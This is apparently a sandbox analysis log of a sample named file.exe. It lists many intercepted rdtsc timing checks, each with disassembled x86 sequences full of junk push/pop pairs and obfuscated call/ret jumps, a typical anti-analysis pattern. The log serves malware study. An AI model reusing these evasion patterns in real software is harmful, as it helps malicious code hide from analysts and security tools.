Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8AB4F second address: F8AB84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD8346DCB36h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8AB84 second address: F8ABC1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD8346DB1F8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FD8346DB1FCh 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007FD8346DB205h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8ABC1 second address: F8ABC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8ABC5 second address: F8ABCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8ACAF second address: F8ACB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8ACB3 second address: F8ACFD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 4E34810Dh 0x0000000e xor dl, 00000000h 0x00000011 lea ebx, dword ptr [ebp+1245AA54h] 0x00000017 or cx, 4A2Fh 0x0000001c xchg eax, ebx 0x0000001d jne 00007FD8346DB201h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jne 00007FD8346DB1F6h 0x0000002d jmp 00007FD8346DB201h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8AD84 second address: F8AD8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8AD8A second address: F8AD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB15A second address: FAB15E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F71EE2 second address: F71EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F71EE6 second address: F71EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA90C7 second address: FA90F2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a pushad 0x0000000b jc 00007FD8346DB1F6h 0x00000011 jmp 00007FD8346DB208h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA90F2 second address: FA90FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA90FB second address: FA90FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA90FF second address: FA911C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD8346DCB34h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA911C second address: FA912C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FD8346DB1F6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA927A second address: FA9280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA9280 second address: FA9284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA9284 second address: FA92A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD8346DCB31h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA92A4 second address: FA92A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA9514 second address: FA9518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA978B second address: FA97A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007FD8346DB1FCh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA98DE second address: FA98E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA98E2 second address: FA98E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA98E6 second address: FA9915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DCB34h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007FD8346DCB2Fh 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA9915 second address: FA9919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA9C59 second address: FA9C6A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007FD8346DCB26h 0x0000000b pop edi 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA9DB2 second address: FA9DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F70382 second address: F70386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAA1C9 second address: FAA1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAA9E0 second address: FAAA27 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD8346DCB33h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FD8346DCB2Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD8346DCB37h 0x00000018 jng 00007FD8346DCB26h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAAA27 second address: FAAA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAAB7E second address: FAAB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAAB84 second address: FAABA5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD8346DB1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD8346DB204h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAABA5 second address: FAABAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAABAB second address: FAABD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jbe 00007FD8346DB1F6h 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FD8346DB207h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAABD7 second address: FAABED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD8346DCB31h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAABED second address: FAABF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAAFB5 second address: FAAFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD8346DCB26h 0x0000000a jmp 00007FD8346DCB30h 0x0000000f jno 00007FD8346DCB26h 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAAFD9 second address: FAAFDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAAFDF second address: FAAFE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAAFE7 second address: FAAFF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB1FE9 second address: FB2004 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB2004 second address: FB200A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB215B second address: FB2162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB2292 second address: FB2296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB2296 second address: FB229A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB229A second address: FB22BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnl 00007FD8346DB1FEh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007FD8346DB1F6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB22BF second address: FB22C9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD8346DCB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB2408 second address: FB240C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB7C25 second address: FB7C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007FD8346DCB26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB7112 second address: FB7118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBB5E4 second address: FBB5E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBB5E8 second address: FBB5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBBB22 second address: FBBB26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBBB26 second address: FBBB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD8346DB1FCh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBBB40 second address: FBBB44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBBB44 second address: FBBB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBCA7D second address: FBCAFA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a jng 00007FD8346DCB26h 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FD8346DCB28h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov si, 773Dh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007FD8346DCB28h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d sub dword ptr [ebp+122D322Dh], eax 0x00000053 push 00000000h 0x00000055 sub dword ptr [ebp+122D2B58h], esi 0x0000005b xchg eax, ebx 0x0000005c je 00007FD8346DCB32h 0x00000062 jne 00007FD8346DCB2Ch 0x00000068 push eax 0x00000069 push ebx 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBE6DC second address: FBE6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBE4AC second address: FBE4B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBE6E1 second address: FBE6E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBF178 second address: FBF17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBEFA9 second address: FBEFAE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBF17D second address: FBF1F1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FD8346DCB28h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 or dword ptr [ebp+122D3864h], eax 0x0000002b push 00000000h 0x0000002d add di, 4F73h 0x00000032 adc si, 0F9Eh 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007FD8346DCB28h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 00000018h 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FD8346DCB2Ch 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0F9B second address: FC101A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FD8346DB1F8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 pop esi 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007FD8346DB1F8h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov esi, 08CBA81Dh 0x00000046 xchg eax, ebx 0x00000047 pushad 0x00000048 jmp 00007FD8346DB205h 0x0000004d push ebx 0x0000004e pushad 0x0000004f popad 0x00000050 pop ebx 0x00000051 popad 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push ebx 0x00000056 jns 00007FD8346DB1F6h 0x0000005c pop ebx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0300 second address: FC030A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD8346DCB2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC101A second address: FC101F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC5147 second address: FC514B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC514B second address: FC5151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC5151 second address: FC5157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC5157 second address: FC515B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC515B second address: FC517D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push esi 0x0000000e jnc 00007FD8346DCB26h 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007FD8346DCB26h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC517D second address: FC5181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC5181 second address: FC51D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FD8346DCB28h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 call 00007FD8346DCB2Bh 0x00000029 pop edi 0x0000002a push 00000000h 0x0000002c mov di, dx 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 pushad 0x00000032 push ebx 0x00000033 pop ebx 0x00000034 jne 00007FD8346DCB26h 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d jnp 00007FD8346DCB26h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC51D5 second address: FC51E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC5FB9 second address: FC5FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC5FBD second address: FC602A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD8346DB1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c add edi, dword ptr [ebp+122D1C3Bh] 0x00000012 movzx ebx, cx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FD8346DB1F8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 mov di, 1D17h 0x00000035 adc di, 753Eh 0x0000003a push 00000000h 0x0000003c call 00007FD8346DB209h 0x00000041 mov dword ptr [ebp+122D1A33h], ebx 0x00000047 pop ebx 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b jno 00007FD8346DB1F8h 0x00000051 push eax 0x00000052 pop eax 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC602A second address: FC603B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD8346DCB28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC7FDC second address: FC7FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB1FBh 0x00000009 popad 0x0000000a jmp 00007FD8346DB201h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC7FFD second address: FC8018 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 je 00007FD8346DCB28h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jng 00007FD8346DCB2Eh 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC9541 second address: FC9545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC877A second address: FC877F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC982D second address: FC9836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCA701 second address: FCA706 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC9836 second address: FC983A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
